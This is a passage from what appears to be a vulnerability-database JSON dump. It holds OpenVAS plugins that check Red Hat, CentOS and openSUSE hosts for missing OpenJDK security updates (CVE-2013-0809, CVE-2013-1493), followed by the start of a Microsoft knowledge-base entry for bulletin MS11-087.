isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870949", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870949", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00016.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870949\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:17:57 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0602-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0602-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0603 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881623", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881623", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0603 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019268.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881623\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:20:03 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0603\");\n script_name(\"CentOS Update for java CESA-2013:0603 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:40:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-11-19T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_6_0-openjdk (openSUSE-SU-2013:0438-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850435", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850435", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850435\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:05:41 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0438-1\");\n script_name(\"openSUSE: Security Advisory for java-1_6_0-openjdk (openSUSE-SU-2013:0438-1)\");\n\n script_tag(name:\"affected\", value:\"java-1_6_0-openjdk on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"java-1_6_0-openjdk aka IcedTea was updated to 1.12.4\n\n - S8007014, CVE-2013-0809: Improve image handling\n\n - S8007675, CVE-2013-1493: Improve color conversion\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_6_0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk\", rpm:\"java-1_6_0-openjdk~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debuginfo\", rpm:\"java-1_6_0-openjdk-debuginfo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-debugsource\", rpm:\"java-1_6_0-openjdk-debugsource~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo\", rpm:\"java-1_6_0-openjdk-demo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-demo-debuginfo\", rpm:\"java-1_6_0-openjdk-demo-debuginfo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel\", rpm:\"java-1_6_0-openjdk-devel~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-devel-debuginfo\", rpm:\"java-1_6_0-openjdk-devel-debuginfo~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-javadoc\", rpm:\"java-1_6_0-openjdk-javadoc~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_6_0-openjdk-src\", rpm:\"java-1_6_0-openjdk-src~1.6.0.0_b27.1.12.4~33.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0603-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870956", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0603-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-March/msg00017.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870956\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:18:44 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0603-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0603-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0602 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881655", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881655", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0602 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019624.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881655\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:36 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0602\");\n script_name(\"CentOS Update for java CESA-2013:0602 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n Note: If the web browser plug-in provided by the icedtea-web package was\n installed, the issues exposed via Java applets could have been exploited\n without user interaction if a user visited a malicious website.\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.8. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:43:11", "description": "<html><body>Resolves a vulnerability in Microsoft Windows that could allow remote code execution.<h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-087. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users: <div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201112.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201112.aspx</a></div>Skip the details: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals: <div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms11-087\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS11-087</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a> Security solutions for IT professionals: <a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a> Help protect your computer that is running Windows from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a> Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a> </div><h2>Fix it for me</h2><div class=\"kb-resolution-section section\">A Fix it solution is available to enable the workaround for CVE-2011-3402. The Fix it solution that is described in this section is not intended to be a replacement for any security update. We recommend that you always install the latest security updates. However, we offer this Fix it solution as a workaround option for some scenarios. For more information about this workaround, visit the following Microsoft Security Advisory webpage: <div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms11-087\" id=\"kb-link-9\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS11-087</a></div> The bulletin provides more information about the issue and includes the following: <ul class=\"sbody-free_list\"><li>The scenarios in which you might apply or disable the workaround</li><li>Mitigating factors</li><li>Workarounds</li><li>Frequently asked questions</li></ul>Specifically, to see this information, expand the Workarounds section that is related to CVE-2011-3402. To enable or disable this Fix it solution, click the Fix it button or link under the Enable heading or under the Disable heading. Click Run in the File Download dialog box, and 